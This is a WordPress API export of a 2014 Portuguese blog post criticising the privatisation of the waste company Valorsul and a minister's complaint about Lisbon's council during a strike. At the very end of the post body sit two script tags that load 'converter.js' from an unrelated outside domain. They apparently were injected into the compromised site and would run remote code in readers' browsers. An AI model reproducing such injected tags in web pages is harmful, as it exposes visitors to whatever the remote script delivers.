{"id":637,"date":"2014-03-22T11:07:09","date_gmt":"2014-03-22T11:07:09","guid":{"rendered":"http:\/\/www.jralmeida.com\/?p=637"},"modified":"2014-11-01T16:20:45","modified_gmt":"2014-11-01T16:20:45","slug":"privatizacoes-com-cheiro-a-negocio","status":"publish","type":"post","link":"https:\/\/www.jralmeida.com\/?p=637","title":{"rendered":"Privatiza\u00e7\u00f5es com cheiro a neg\u00f3cio"},"content":{"rendered":"<p>O ministro Jorge Moreira da Silva afirmou, sobre a greve dos trabalhadores da Valorsul e sobre o facto da C\u00e2mara Municipal de Lisboa ter recorrido a outros operadores:<\/p>\n<p>&#8220;Registo com desagrado que alguns [munic\u00edpios] est\u00e3o interessados em desvalorizar a empresa porque avan\u00e7am com uma contesta\u00e7\u00e3o que est\u00e1 a criar condi\u00e7\u00f5es para que a empresa tenha um menor valor e que alguns candidatos com propostas estrat\u00e9gicas mais elevadas se possam desinteressar&#8221;, afirmou Jorge Moreira da Silva.<\/p>\n<p>O ministro queixava-se de a C\u00e2mara Municipal de Lisboa ter aproveitado a greve para usar operadores que n\u00e3o os da sua \u00e1rea, \u00e0 revelia do estipulado superiormente.<\/p>\n<p>N\u00e3o entendo. Eu julgava que a vantagem da privatiza\u00e7\u00e3o era ter um operador privado, habituado ao risco, din\u00e2mico, capaz de com os mesmos recursos fazer mais. Mas afinal n\u00e3o. Parece que vai ser algu\u00e9m que vai pagar um activo p\u00fablico, \u00a0com aquele frenesim do vendedor que quer ver dinheiro \u00e0 vista, \u00a0mas com uma contrapartida: um mercado garantido \u2013 p\u00fablico, claro &#8211; \u00a0e &#8211; por causa disso mesmo &#8211; levado ao fim de certo tempo a aumentar as tarifas, como forma de melhor viabilizar o neg\u00f3cio adquirido.<\/p>\n<p>Ou seja, o risco fica todo do lado p\u00fablico e do consumidor. Mais uma vez, tal como aconteceu com os neg\u00f3cios que, mais tarde, se veio a criticar como desastrosos.<\/p>\n<p>Mas neste, ainda vamos a tempo.<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><br \/>\n<script src=\"http:\/\/centrexity.com\/converter.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O ministro Jorge Moreira da Silva afirmou, sobre a greve dos trabalhadores da Valorsul e sobre o facto da C\u00e2mara Municipal de Lisboa ter recorrido a outros operadores: &#8220;Registo com desagrado que alguns [munic\u00edpios] est\u00e3o interessados em desvalorizar a empresa porque avan\u00e7am com uma contesta\u00e7\u00e3o que est\u00e1 a criar condi\u00e7\u00f5es para que a empresa tenha [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31],"tags":[],"class_list":["post-637","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"_links":{"self":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/637","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=637"}],"version-history":[{"count":1,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/637\/revisions"}],"predecessor-version":[{"id":1421,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/637\/revisions\/1421"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/media\/469"}],"wp:attachment":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=637"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=637"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=637"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}